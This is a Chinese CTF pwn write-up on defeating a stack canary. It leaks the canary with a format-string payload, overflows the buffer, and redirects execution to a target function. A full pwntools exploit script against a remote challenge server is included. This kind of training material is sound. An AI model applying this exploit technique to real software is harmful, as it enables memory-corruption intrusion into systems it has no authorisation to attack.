ctf(pwn) canary保护机制讲解 与 破解方法介绍
程序执行流程
有三个选项,1是利用栈溢出,2是利用格式化字符串,3是退出;可连续输入多次;
IDA分析
解题思路
程序存在canary保护,利用格式化字符串漏洞 得到canary的位置, 在利用栈溢出覆盖它,返回地址改为目标函数 4008da
EXP
from pwn import *
r=remote('111.200.241.244',58448)
r.sendlineafter("3. Exit the battle ",'2') #先进入格式化字符串利用
r.sendline("%23$p")
r.recvuntil("0x")
canary=int(r.recv(16),16) #长度16位 取16进制
r.sendlineafter("3. Exit the battle ",'1') #再进入栈溢出利用
payload='a'*0x88+p64(canary)+'a'*8+p64(0x4008da)
r.send(payload)
r.interactive()
EXP解读
r.sendline("%23$p")
0x90-8h=0x88
0x88/0x8=0x11(十进制17)
这里除以8是因为(我翻了一下汇编语言这一本书):
8bit组成1个Byte,也就是一个字节
微型机存储器的存储单元可以存储一个字节,即8个二进制位
一个存储器有128个存储单元,它可存储128个字节
往后找17+6=23个地址上即存canary的值
这里加6是 print输入的偏移量
可以看看 CTF(pwn)-格式化字符串漏洞讲解(二) --攻防世界CGfsb
2.payload='a'*0x88+p64(canary)+'a'*8+p64(0x4008da)
